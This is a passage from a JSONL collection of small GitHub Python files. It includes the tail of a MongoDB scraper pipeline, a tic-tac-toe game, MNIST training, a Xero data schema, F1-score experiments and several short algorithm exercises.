更新已存在的主播数据\n return item\n\n def process_anchorid(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('anchorId')})\n if not res:\n data = {\n \"anchorId\": item['anchorId'],\n }\n self.collection.insert_one(data)\n return item\n\n def process_anchorfansFeature(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('anchorId')})\n if not res:\n\n data = {\n \"anchorId\": str(item['anchorId']),\n 'age': item['age'],\n 'area': item['area'],\n 'career': item['career'],\n 'cate': item['cate'],\n 'gender': item['gender'],\n 'interest': item['interest']\n }\n self.collection.insert_one(data)\n else:\n if res.get('area') == item.get('area') and res.get('area') == item.get('area') and res.get('career') == item.get(\n 'career') and res.get('cate') == item.get('cate') and res.get('gender') == item.get(\n 'gender') and res.get('interest') == item.get(\n 'interest'):\n pass\n else:\n self.collection.update_one({'anchorId': str(id)},\n {'$set':\n {\n 'age': item.get('age'),\n 'area': item.get('area'),\n 'career': item.get('career'),\n 'cate': item.get('cate'),\n 'gender': item.get('gender'),\n 'interest': item.get('interest'),\n }\n }\n )\n return item\n\n def process_id_to_redis(self, item):\n self.redis.sadd('anchorId', item['anchorId'])\n return item\n\n def process_organ(self, item):\n res = self.collection.find_one({\"_id\": str(item.get('organId'))})\n try:\n darenCount = int(item.get('darenCount'))\n except:\n darenCount = None\n\n try:\n topdrenCount = int(item.get('topdrenCount'))\n except:\n topdrenCount = None\n\n try:\n compositeScore = int(item.get('compositeScore'))\n except:\n compositeScore = None\n\n if not res:\n data = {\n\n '_id': str(item.get('organId')),\n 'organText': item.get('organText'),\n 'organName': item.get('organName'),\n 'agencyPhoto': item.get('agencyPhoto'),\n 'tag': item.get('tag'),\n 'catetgory': item.get('catetgory'),\n 'darenCount': darenCount,\n 'topdrenCount': topdrenCount,\n 'compositeScore': compositeScore,\n 'verticalField': item.get('verticalField'),\n 'platform': 1,\n }\n self.collection.insert_one(data) # 插入一条不存在的主播数据\n else:\n if res.get('organText') == item.get('organText') and res.get('organName') == item.get('organName') and res.get(\n 'agencyPhoto') == item.get('agencyPhoto') and res.get('tag') == item.get('tag') and res.get(\n 'catetgory') == item.get('catetgory') and res.get('darenCount') == darenCount and res.get(\n 'topdrenCount') == topdrenCount and res.get('compositeScore') == compositeScore and res.get(\n 'verticalField') == item.get('verticalField'):\n pass\n else:\n self.collection.update_one({'_id': str(id)},\n {'$set':\n {\n 'organText': item.get('organText'),\n 'organName': item.get('organName'),\n 'agencyPhoto': item.get('agencyPhoto'),\n 'tag': item.get('tag'),\n 'catetgory':item.get('catetgory'),\n 'darenCount': darenCount,\n 'topdrenCount': topdrenCount,\n 'compositeScore': compositeScore,\n 'verticalField': item.get('verticalField')\n }\n }\n ) # 更新已存在的机构数据\n return item\n","repo_name":"1987128073/project","sub_path":"pinyou/AnchorIdSpider/AnchorIdSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":11428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11409410426","text":"# coding=utf-8\n__author__ = 'mlaptev'\n\nif __name__ == \"__main__\":\n amount, i, number = int(input()), 0, 0\n while i < amount:\n for j in range(number):\n if i >= amount:\n break\n i += 1\n print(number, end=' ')\n number += 1\n","repo_name":"MikeLaptev/sandbox_python","sub_path":"stepic/python_basic/module2/Module2Lesson6Step8.py","file_name":"Module2Lesson6Step8.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3507500395","text":"from flask import Flask, render_template, request, jsonify\nfrom utils import get_pm25_data\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/get_pm25_data\", methods=[\"POST\"])\ndef get_pm25_data_route():\n latitude = request.json[\"latitude\"]\n longitude = request.json[\"longitude\"]\n pm25_data = get_pm25_data(latitude, longitude)\n return jsonify(pm25_data)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"wabinyai/My_research-lab","sub_path":"src/map_predict/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41419330185","text":"\"\"\"Tic-Tac-Toe, by Al Sweigart al@inventwithpython.com\nThe classic board game.\nThis code is available at https://nostarch.com/big-book-small-python-programming\nTags: short, board game, game, two-player\"\"\"\n\nALL_SPACES = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\nX, O, BLANK = 'X', 'O', ' ' # 문자열 값에 대한 상수\n\n\ndef main():\n print('Welcome to Tic-Tac-Toe!')\n gameBoard = getBlankBoard() # 틱-택-토 보드 딕셔너리를 생성한다.\n currentPlayer, nextPlayer = X, O # X가 먼저 나오고, 그 다음에 O가 나온다.\n\n while True: # 메인 게임 루프\n # 화면에 보드 표시하기:\n print(getBoardStr(gameBoard))\n\n # 사용자가 1-9 숫자를 입력할 때까지 계속 요청한다:\n move = None\n while not isValidSpace(gameBoard, move):\n print('What is {}\\'s move? (1-9)'.format(currentPlayer))\n move = input('> ')\n updateBoard(gameBoard, move, currentPlayer) # 턴을 진행한다.\n\n # 게임이 끝났는지 확인한다:\n if isWinner(gameBoard, currentPlayer): # 승자를 확인한다.\n print(getBoardStr(gameBoard))\n print(currentPlayer + ' has won the game!')\n break\n elif isBoardFull(gameBoard): # 무승부인지 확인한다.\n print(getBoardStr(gameBoard))\n print('The game is a tie!')\n break\n # 다음 플레이어 턴으로 바꾼다:\n currentPlayer, nextPlayer = nextPlayer, currentPlayer\n print('Thanks for playing!')\n\n\ndef getBlankBoard():\n \"\"\"비어 있는 새로운 틱-택-토 보드를 생성한다.\"\"\"\n # 빈칸에 대한 번호: 1|2|3\n # -+-+-\n # 4|5|6\n # -+-+-\n # 7|8|9\n # 키는 1부터 9이고, 값은 X, O, 또는 BLANK:\n board = {}\n for space in ALL_SPACES:\n board[space] = BLANK # 모든 칸을 빈칸으로 시작한다.\n return board\n\n\ndef getBoardStr(board):\n \"\"\"보드에 대한 텍스트를 반환한다.\"\"\"\n return '''\n {}|{}|{} 1 2 3\n -+-+-\n {}|{}|{} 4 5 6\n -+-+-\n {}|{}|{} 7 8 9'''.format(board['1'], board['2'], board['3'],\n board['4'], board['5'], board['6'],\n board['7'], board['8'], board['9'])\n\ndef isValidSpace(board, space):\n \"\"\"보드의 공백이 유효한 공백 번호고 비어 있다면\n True를 반환한다.\"\"\"\n return space in ALL_SPACES and board[space] == BLANK\n\n\ndef isWinner(board, player):\n \"\"\"플레이어가 TTT 보드의 승자라면 True를 반환한다.\"\"\"\n # 가독성을 위해 여기에 사용된 짧은 변수 이름:\n b, p = board, player\n # 행 3개, 열 3개, 대각선 2개에 걸쳐 표시가 있는지 확인한다.\n return ((b['1'] == b['2'] == b['3'] == p) or # 상단 행\n (b['4'] == b['5'] == b['6'] == p) or # 중단 행\n (b['7'] == b['8'] == b['9'] == p) or # 하단 행\n (b['1'] == b['4'] == b['7'] == p) or # 왼쪽 열\n (b['2'] == b['5'] == b['8'] == p) or # 중앙 열\n (b['3'] == b['6'] == b['9'] == p) or # 오른쪽 열\n (b['3'] == b['5'] == b['7'] == p) or # 대각선\n (b['1'] == b['5'] == b['9'] == p)) # 대각선\n\ndef isBoardFull(board):\n \"\"\"보드의 모든 공간이 채워지면 True를 반환한다.\"\"\"\n for space in ALL_SPACES:\n if board[space] == BLANK:\n return False # 만약에 빈칸이 있다면 False를 반환한다.\n return True # 빈칸이 없다면 True를 반환한다.\n\n\ndef updateBoard(board, space, mark):\n \"\"\"보드에 표시할 공간을 설정한다.\"\"\"\n board[space] = mark\n\n\nif __name__ == '__main__':\n main() # 이 모듈이 임포트되지 않고 실행된다면 main()이 호출된다.\n","repo_name":"Jpub/PyProject","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"36823188004","text":"from sklearn.datasets import make_classification, make_moons, make_gaussian_quantiles\nfrom sklearn import tree\nfrom cross_val.cross_val import cross_val_pred2ict\nfrom simplefunctions import *\nfrom imblearn.datasets import make_imbalance\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.base import clone\nfrom sklearn.model_selection import StratifiedKFold, KFold\nimport os\n\npath = os.path.dirname(os.path.abspath(__file__))\n\n# generowanie danych\ndata___, target___ = make_classification(n_samples=1500, n_features=2, n_redundant=0, n_informative=2, n_classes=2,\n weights=[0.8, 0.2], random_state=5)\ndata__, target__ = make_imbalance(data___, target___, ratio=0.1, min_c_=1, random_state=23)\ndata_, target_ = shuffle(data__, target__)\nmask = target_ == 1\n\n# liczba testow f1\nmax_iter = 500\n\n# klasyfikator\nclf = tree.DecisionTreeClassifier()\n\n# sprawdzian krzyzowy\nfolds = [StratifiedKFold(n_splits=10, random_state=5), KFold(n_splits=10, random_state=5)]\nname_folds = ['Stratified CV, k=10', 'Unstratified CV, k=10']\n\n# wykres\nfig1 = plt.figure(facecolor='white', figsize=(7.532, 6))\nplt.rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica'], 'size': 10})\nplt.rc('legend', fontsize=10)\n## for Palatino and other serif fonts use:\n# rc('font',**{'family':'serif','serif':['Palatino']})\n\n\nfor id, (fold, name) in enumerate(zip(folds, name_folds)):\n print('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\n print(name)\n stdtpfp = []\n stdprere = []\n stdavg = []\n ftpfpall = []\n fprereall = []\n favgall = []\n\n # badanie zaleznosci miary f1 w stosunku do ilosci przykladow kl. mniejszosciowej\n for miniority in np.arange(1, 11, 1):\n\n max_items = miniority * 10\n\n # wybor 1000 obserwacji\n idx_maj = np.where(~mask)[0][:1000 - max_items]\n idx_min = np.where(mask)[0][:max_items]\n idx = np.concatenate((idx_min, idx_maj), axis=0)\n\n data, target = data_[idx, :], target_[idx]\n\n items = np.bincount(target)\n\n ftpfp = []\n fprere = []\n favg = []\n\n # powtarzanie iteracji\n for r in range(max_iter):\n # print(r)\n # klonowanie klasyfikatora\n clf_ = clone(clf)\n data_re, target_re = shuffle(data, target)\n skf = fold\n predictions = []\n targets = []\n\n # sprawdzian krzyzowy\n for train_index, test_index in skf.split(data_re, target_re):\n clf_train_ = clone(clf)\n\n clf_train_.fit(data_re[train_index], target_re[train_index])\n predictions.append(clf_train_.predict(data_re[test_index]))\n targets.append(target_re[test_index])\n\n # obliczanie f1\n f1 = f1_calculate(predictions, targets)\n ftpfp.append(f1[0])\n fprere.append(f1[1])\n favg.append(f1[2])\n\n # obliczanie std i sredniej\n stdtpfp.append(np.std(ftpfp))\n stdprere.append(np.std(fprere))\n stdavg.append(np.std(favg))\n\n ftpfpall.append(np.mean(ftpfp))\n fprereall.append(np.mean(fprere))\n favgall.append(np.mean(favg))\n print('----------------------------------')\n print('%s%% klasy mniejszosciowej' % miniority)\n print('')\n print('F1 TP FP = %s, od. std. = %s' % (np.mean(ftpfp), np.std(ftpfp)))\n print('F1 PR RE = %s, od. std. = %s' % (np.mean(fprere), np.std(fprere)))\n print('F1 AVG = %s, od. std. = %s' % (np.mean(favg), np.std(favg)))\n print('')\n\n # wyswietlanie wykresow\n if id == 0:\n ax1 = plt.subplot(2, 2, 1 + id)\n else:\n ax2 = plt.subplot(2, 2, 1 + id, sharey=ax1)\n plt.plot([x for x in range(1, 11)], stdtpfp, 's-', lw=2, label=\"F1 TP FP FN\")\n plt.plot([x for x in range(1, 11)], stdprere, 'p-', lw=2, label=\"F1 PR RE\")\n plt.plot([x for x in range(1, 11)], stdavg, '*-', lw=2, label=\"F1 AVG\")\n if id == 0:\n plt.ylabel('Odchylenie standardowe')\n plt.xlabel('Procent klasy mniejszosciowej')\n plt.xlim(0.8, 10.2)\n plt.title('Od. std. F1, %s' % name)\n plt.legend(loc=\"upper right\")\n\n if id == 0:\n ax3 = plt.subplot(2, 2, 3 + id, sharex=ax1)\n else:\n ax4 = plt.subplot(2, 2, 3 + id, sharex=ax2, sharey=ax3)\n plt.plot([x for x in range(1, 11)], ftpfpall, 's-', lw=2, label=\"F1 TP FP FN\")\n plt.plot([x for x in range(1, 11)], fprereall, 'p-', lw=2, label=\"F1 PRE RE\")\n plt.plot([x for x in range(1, 11)], favgall, '*-', lw=2, label=\"F1 AVG\")\n if id == 0:\n plt.ylabel('Miara F1')\n plt.xlabel('Procent klasy mniejszosciowej')\n plt.xlim(0.8, 10.2)\n plt.title('Miara F1, %s' % name)\n plt.legend(loc=\"lower right\")\nplt.tight_layout()\nplt.savefig(os.path.join(path, 'wyniki/wykresy_zdjecia/miara-F1.png'), dpi=120)\nfig1.show()\nraw_input()\n","repo_name":"kob22/pracamgr","sub_path":"tests/test_f1.py","file_name":"test_f1.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70341722408","text":"from xero.pipeline.interface import Pipeline\nfrom xero.pipeline.utils import parse_timestamp\nfrom xero.pipeline.headers import timeframe\n\npipeline = Pipeline(\n name=\"BankTransactions\",\n headers_fn=timeframe,\n uri=\"api.xro/2.0/BankTransactions\",\n res_fn=lambda x: x[\"BankTransactions\"],\n transform=lambda rows: [\n {\n \"Contact\": {\n \"ContactID\": row[\"Contact\"].get(\"ContactID\"),\n }\n if row.get(\"Contact\")\n else {},\n \"DateString\": row.get(\"DateString\"),\n \"Status\": row.get(\"Status\"),\n \"LineAmountTypes\": row.get(\"LineAmountTypes\"),\n \"LineItems\": [\n {\n \"Description\": line_item.get(\"Description\"),\n \"UnitAmount\": line_item.get(\"UnitAmount\"),\n \"TaxType\": line_item.get(\"TaxType\"),\n \"TaxAmount\": line_item.get(\"TaxAmount\"),\n \"LineAmount\": line_item.get(\"LineAmount\"),\n \"AccountCode\": line_item.get(\"AccountCode\"),\n \"Quantity\": line_item.get(\"Quantity\"),\n \"LineItemID\": line_item.get(\"LineItemID\"),\n }\n for line_item in row[\"LineItems\"]\n ]\n if row.get(\"LineItems\")\n else [],\n \"SubTotal\": row.get(\"SubTotal\"),\n \"TotalTax\": row.get(\"TotalTax\"),\n \"Total\": row.get('\"Total\"'),\n \"UpdatedDateUTC\": parse_timestamp(row.get(\"UpdatedDateUTC\")),\n \"CurrencyCode\": row.get(\"CurrencyCode\"),\n \"BankTransactionID\": row.get(\"BankTransactionID\"),\n \"BankAccount\": {\n \"AccountID\": row[\"BankAccount\"].get(\"AccountID\"),\n \"Code\": row[\"BankAccount\"].get(\"Code\"),\n \"Name\": row[\"BankAccount\"].get(\"Name\"),\n }\n if row.get(\"BankAccount\")\n else {},\n \"BatchPayment\": {\n \"Account\": {\n \"AccountID\": row[\"BatchPayment\"][\"Account\"].get(\"AccountID\"),\n }\n if row[\"BatchPayment\"].get(\"Account\")\n else {},\n \"BatchPaymentID\": row[\"BatchPayment\"].get(\"BatchPaymentID\"),\n \"Date\": row[\"BatchPayment\"].get(\"Date\"),\n \"Type\": row[\"BatchPayment\"].get(\"Type\"),\n \"Status\": row[\"BatchPayment\"].get(\"Status\"),\n \"TotalAmount\": row[\"BatchPayment\"].get(\"TotalAmount\"),\n \"UpdatedDateUTC\": row[\"BatchPayment\"].get(\"UpdatedDateUTC\"),\n \"IsReconciled\": row[\"BatchPayment\"].get(\"IsReconciled\"),\n }\n if row.get(\"BatchPayment\")\n else {},\n \"Type\": row.get(\"Type\"),\n \"Reference\": row.get(\"Reference\"),\n \"IsReconciled\": row.get(\"IsReconciled\"),\n }\n for row in rows\n ],\n schema=[\n {\n \"name\": \"Contact\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\"name\": \"ContactID\", \"type\": \"STRING\"},\n ],\n },\n {\"name\": \"DateString\", \"type\": \"TIMESTAMP\"},\n {\"name\": \"Status\", \"type\": \"STRING\"},\n {\"name\": \"LineAmountTypes\", \"type\": \"STRING\"},\n {\n \"name\": \"LineItems\",\n \"type\": \"RECORD\",\n \"mode\": \"REPEATED\",\n \"fields\": [\n {\"name\": \"Description\", \"type\": \"STRING\"},\n {\"name\": \"UnitAmount\", \"type\": \"NUMERIC\"},\n {\"name\": \"TaxType\", \"type\": \"STRING\"},\n {\"name\": \"TaxAmount\", \"type\": \"NUMERIC\"},\n {\"name\": \"LineAmount\", \"type\": \"NUMERIC\"},\n {\"name\": \"AccountCode\", \"type\": \"STRING\"},\n {\"name\": \"Quantity\", \"type\": \"NUMERIC\"},\n {\"name\": \"LineItemID\", \"type\": \"STRING\"},\n ],\n },\n {\"name\": \"SubTotal\", \"type\": \"NUMERIC\"},\n {\"name\": \"TotalTax\", \"type\": \"NUMERIC\"},\n {\"name\": \"Total\", \"type\": \"NUMERIC\"},\n {\"name\": \"UpdatedDateUTC\", \"type\": \"TIMESTAMP\"},\n {\"name\": \"CurrencyCode\", \"type\": \"STRING\"},\n {\"name\": \"BankTransactionID\", \"type\": \"STRING\"},\n {\n \"name\": \"BankAccount\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\"name\": \"AccountID\", \"type\": \"STRING\"},\n {\"name\": \"Code\", \"type\": \"STRING\"},\n {\"name\": \"Name\", \"type\": \"STRING\"},\n ],\n },\n {\n \"name\": \"BatchPayment\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\n \"name\": \"Account\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\"name\": \"AccountID\", \"type\": \"STRING\"},\n ],\n },\n {\"name\": \"BatchPaymentID\", \"type\": \"STRING\"},\n {\"name\": \"Date\", \"type\": \"STRING\"},\n {\"name\": \"Type\", \"type\": \"STRING\"},\n {\"name\": \"Status\", \"type\": \"STRING\"},\n {\"name\": \"TotalAmount\", \"type\": \"NUMERIC\"},\n {\"name\": \"UpdatedDateUTC\", \"type\": \"STRING\"},\n {\"name\": \"IsReconciled\", \"type\": \"STRING\"},\n ],\n },\n {\"name\": \"Type\", \"type\": \"STRING\"},\n {\"name\": \"Reference\", \"type\": \"STRING\"},\n {\"name\": \"IsReconciled\", \"type\": \"STRING\"},\n ],\n id_key=\"BankTransactionID\",\n)\n","repo_name":"hieumdd/dolfin-blue-xero","sub_path":"xero/pipeline/bank_transactions.py","file_name":"bank_transactions.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12478338355","text":"import numpy as np\r\nimport pandas as pd\r\nfrom modules import mnistNN\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torchvision.transforms as T\r\nimport torch.optim as optim\r\n\r\nn_epochs = 3\r\nbatch_size_train = 60\r\nbatch_size_test = 1000\r\nlearning_rate = 0.001\r\nmomentum = 0.9\r\nlog_interval = 10\r\n\r\nrandom_seed = 1\r\ntorch.manual_seed(random_seed)\r\n\r\ntrain_data = pd.read_csv('mnist/mnist_train.csv')\r\nrow, colm = train_data.shape\r\nsample_data = train_data.sample(frac=1)\r\n\r\ntrain_label = torch.tensor(sample_data[\"label\"]).reshape(int(row/batch_size_train),batch_size_train,1).cuda()\r\nprint(train_label.shape)\r\ntrain_image = torch.tensor(sample_data[train_data.columns[1:]].to_numpy())\r\n\r\ntest_data = pd.read_csv('mnist/mnist_test.csv')\r\nrow, colm = test_data.shape\r\nsample_data = test_data.sample(frac=1)\r\n\r\ntest_label = torch.tensor(sample_data[\"label\"]).reshape(int(row/batch_size_test),batch_size_test,1).cuda()\r\ntest_image = torch.tensor(sample_data[train_data.columns[1:]].to_numpy())\r\n\r\nmnist = mnistNN(1,320,10,10,20,5).cuda()\r\nprint(mnist)\r\nparams = list(mnist.parameters())\r\nprint(len(params))\r\nprint(params[0].size())\r\n\r\ntrain_loader = train_image.reshape(int(len(train_image)/batch_size_train),batch_size_train,1,28,28).type(torch.float).cuda()\r\ntest_loader = test_image.reshape(int(len(test_image)/batch_size_test),batch_size_test,1,28,28).type(torch.float).cuda()\r\n\r\nprint(train_loader.shape)\r\nprint(train_loader[0].shape)\r\n\r\noutput = mnist(train_loader[0])\r\n\r\n#img = F.interpolate(img, size=32)\r\n\r\nprint(output)\r\n\r\ncriterion = nn.CrossEntropyLoss()\r\noptimizer = optim.SGD(mnist.parameters(), lr=0.001, momentum=0.9)\r\n\r\ntrain_losses = []\r\ntrain_counter = []\r\ntest_losses = []\r\ntest_counter = [i*len(train_image) for i in range(n_epochs + 1)]\r\n\r\ndef train(epoch):\r\n mnist.train()\r\n for batch_idx, data in enumerate(train_loader):\r\n optimizer.zero_grad()\r\n target = train_label[batch_idx].flatten()\r\n output = mnist(data)\r\n loss = F.nll_loss(output, target)\r\n loss.backward()\r\n optimizer.step()\r\n if batch_idx % log_interval == 0:\r\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\r\n epoch, batch_idx * len(data) , len(train_image),\r\n 100. * batch_idx / len(train_loader), loss.item(),))\r\n train_losses.append(loss.item())\r\n train_counter.append((batch_idx*60)+((epoch-1)*len(train_loader)))\r\n torch.save(mnist.state_dict(), 'results/model.pth')\r\n torch.save(optimizer.state_dict(), 'results/optimizer.pth')\r\n\r\n\r\ndef test():\r\n mnist.eval()\r\n test_loss = 0\r\n correct = 0\r\n with torch.no_grad():\r\n for batch_idx, data in enumerate(test_loader):\r\n output = mnist(data)\r\n target = test_label[batch_idx].flatten()\r\n test_loss += F.nll_loss(output, target, size_average=False).item()\r\n\r\n pred = output.data.max(1, keepdim=True)[1]\r\n correct += pred.eq(target.data.view_as(pred)).sum()\r\n \r\n test_loss /= len(test_image)\r\n test_losses.append(test_loss)\r\n print('\\nTest set: Avg. loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\r\n test_loss, correct, len(test_image), 100. * correct / len(test_image)\r\n ))\r\n\r\ntest()\r\nfor epoch in range(1, n_epochs + 1):\r\n train(epoch)\r\n test()","repo_name":"nctran108/Hand_writing_ML","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10898264698","text":"# REVISE\n# Given an unsorted array of non-negative integers, find a continuous sub-array which adds to a given number.\n# Ex: Input: arr[] = {1, 4, 20, 3, 10, 5}, sum = 33\n# Output: Sum found between indexes 2 and 4\ndef targetContiguousSubArray(arr, target):\n n = len(arr)\n start, end = 0, 0\n i = 1\n sum = arr[0]\n\n while n > i > start:\n if sum == target:\n end = i - 1\n break\n if sum < target:\n sum += arr[i]\n i += 1\n if sum > target:\n sum -= arr[start]\n start += 1\n if end == 0:\n print(\"There is no such subarray\")\n else:\n print(\"Target sum of \" + str(target) + \" occurs between: \" + str(start) + \" and \" + str(end) + \" indices\")\n\n\n# Time complexity = O(n)\n# Space complexity = O(1)\ntargetContiguousSubArray([1, 4, 20, 3, 10, 5], 33)\ntargetContiguousSubArray([1, 4, 20, 3, -3, 13], 33)\ntargetContiguousSubArray([1, 4, 0, 0, 0], 33)\ntargetContiguousSubArray([35, 35, 35, 35, 35], 33)\ntargetContiguousSubArray([1, 4, 0, 0, 3, 10, 5], 7)\ntargetContiguousSubArray([1, 4], 0)\n\n\n# ------------------------------------------------------------------\n\n# Including negative numbers:\n\ndef targetContiguousSubArray_negNumbers(arr, target):\n n = len(arr)\n curr_sum = 0\n hashmap = {}\n for i in range(0, n):\n curr_sum += arr[i]\n\n if curr_sum == target:\n print(\"The target sum of \" + str(target) + \" is between 0 and \" + str(i))\n return\n if curr_sum - target in hashmap:\n print(\"Sum found between: \", hashmap[curr_sum - target] + 1, \"to\", i)\n return\n hashmap[curr_sum] = i\n\n # If we reached here, then there is no subarray\n print(\"No sub-array with give sum exists\")\n\n#targetContiguousSubArray_negNumbers([0,2,-2,-20,10], -10)\n#targetContiguousSubArray_negNumbers([3,4,7,2,-3,1,4,2], 7)\ntargetContiguousSubArray_negNumbers([3,0,1,2,-3,1,4,2], 7)\n","repo_name":"snagari-coder/Data_Structure_Algorithms","sub_path":"Arrays/subArraySumMatchingTarget.py","file_name":"subArraySumMatchingTarget.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1694453796","text":"from fastmri_recon.evaluate.scripts.postprocess_eval import evaluate_vnet_postproc\n# from fastmri_recon.evaluate.scripts.xpdnet_inference import xpdnet_inference\nfrom fastmri_recon.models.subclassed_models.denoisers.proposed_params import get_model_specs\nfrom fastmri_recon.training_scripts.postprocess_train import train_vnet_postproc\n\nfrom jean_zay.submitit.general_submissions import train_eval_grid, eval_grid, infer_grid\n\n\njob_name = 'post_process'\nrun_ids = {\n 4: 'xpdnet_sense__af4_compound_mssim_rf_smb_MWCNNmedium_1606491318',\n 8: 'xpdnet_sense__af8_compound_mssim_rf_smb_MWCNNmedium_1606491318',\n}\nloss = 'compound_mssim'\nbrain = False\nlr = 1e-4\nn_samples = None\nn_epochs = 190\nuse_mixed_precision = False\nbase_n_filters = 4\nn_scales = 3\nnon_linearity = 'lrelu'\n\nparameter_grid = [\n dict(\n original_run_id=run_ids[8],\n brain=brain,\n n_epochs=n_epochs,\n n_samples=n_samples,\n af=8,\n loss=loss,\n lr=lr,\n use_mixed_precision=use_mixed_precision,\n base_n_filters=base_n_filters,\n n_scales=n_scales,\n non_linearity=non_linearity,\n )\n] + [\n dict(\n original_run_id=run_ids[4],\n brain=brain,\n n_epochs=n_epochs,\n n_samples=n_samples,\n af=4,\n loss=loss,\n lr=lr,\n use_mixed_precision=use_mixed_precision,\n base_n_filters=base_n_filters,\n n_scales=n_scales,\n non_linearity=non_linearity,\n )\n]\n\neval_results, run_ids = train_eval_grid(\n# run_ids = [\n# 'xpdnet_sense__af8_compound_mssim_rf_smb_MWCNNmedium_1606491318',\n# 'xpdnet_sense__af4_compound_mssim_rf_smb_MWCNNmedium_1606491318',\n# ]\n\n# eval_results = eval_grid(\n job_name,\n train_vnet_postproc,\n evaluate_vnet_postproc,\n parameter_grid,\n # run_ids=run_ids,\n n_samples_eval=50,\n timeout_train=100,\n n_gpus_train=1,\n timeout_eval=10,\n n_gpus_eval=1,\n # n_samples=100,\n # timeout=10,\n # n_gpus=1,\n to_grid=False,\n return_run_ids=True,\n params_to_ignore=['use_mixed_precision']\n)\n\nprint(eval_results)\n\n# infer_grid(\n# job_name,\n# xpdnet_inference,\n# parameter_grid,\n# run_ids=run_ids,\n# timeout=10,\n# n_gpus=4,\n# to_grid=False,\n# params_to_ignore=['mask_type', 'multicoil'],\n# )\n","repo_name":"zaccharieramzi/submission-scripts","sub_path":"jean_zay/submitit/fastmri_reproducible_benchmark/xpdnet_multicoil/postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"17214026864","text":"class Solution:\n def searchMatrix(self, matrix, target):\n \"\"\"\n O(log(m) + log(n)) time algorithm where m is the # rows in the matrix, n is the # columns in the matrix, basic idea is use binary search to locate where the target should be, and then do binary search on that row to find where the target is\n \"\"\"\n if not matrix or not matrix[0]:\n return False\n l_r, l_c = 0, 0\n r_r, r_c = len(matrix) - 1, len(matrix[0]) - 1\n \n while l_r < r_r:\n m = (l_r + r_r) // 2\n if matrix[m][0] > target:\n r_r = m - 1\n else:\n if matrix[m][-1] < target:\n l_r = m + 1\n else:\n r_r = m\n while l_c <= r_c:\n m = (l_c + r_c) // 2\n if matrix[l_r][m] > target:\n r_c = m - 1\n elif matrix[l_r][m] < target:\n l_c = m + 1\n else:\n return True\n \n return False\n ","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/74_SearchA2DMatrix.py","file_name":"74_SearchA2DMatrix.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71458441127","text":"print(\"-----MENU DRIVEN CODE-----\")\r\n\r\nprint(\"1:\",\"CHECK WHETHER NUMBER IS PALINDROME NUMBER OR NOT\")\r\nprint(\"2:\",\"LOGIN VALIDATION \")\r\nprint(\"3:\",\"STUDENT DISCPUNT: \")\r\nch=int(input(\"ENTER YOPUR CHOICE: \"))\r\n \r\n\r\nif(ch==1):\r\n num=int(input(\"Enter number to check for palindrome:\")) \r\n rev=0\r\n temp=num\r\n rev=rev*10+num%10\r\n num=num//10\r\n rev=rev*10+num%10\r\n num=num//10\r\n rev=rev*10+num%10\r\n num=num//10\r\n if(rev==temp):\r\n print(temp,\"is palindrome\")\r\n else:\r\n print(temp,\"is not palindrome\")\r\nelif(ch==2):\r\n\r\n import random\r\n user=input(\"enter username:\")\r\n passw=input(\"enter password :\")\r\n otp=random.randint(1000,9999)\r\n if(user==\"abc\")and(passw==\"123\"):\r\n utp=otp\r\n print(\"otp is :\",utp)\r\n print(\"login succesful\")\r\n else:\r\n print(\"login denied\")\r\nelif(ch==3):\r\n p=input(\"are u a student (y/n) :\")\r\n amt=float(input(\"enter the amount :\"))\r\n if(p==\"y\" or p==\"Y\"):\r\n if(amt>=2000):\r\n discount=amt*40/100\r\n else:\r\n discount=amt*8/100 \r\n else:\r\n if(amt>=4000):\r\n discount=amt*25/100 \r\n else:\r\n discount=amt*3/100 \r\n\r\n final=amt-discount\r\n print(\"your total amount is: \",amt)\r\n print(\"your discount is:\",discount)\r\n print(\"you pay :\",final) \r\nelse:\r\n print(\"INVALID CHOICE\")\r\nprint(\"----END 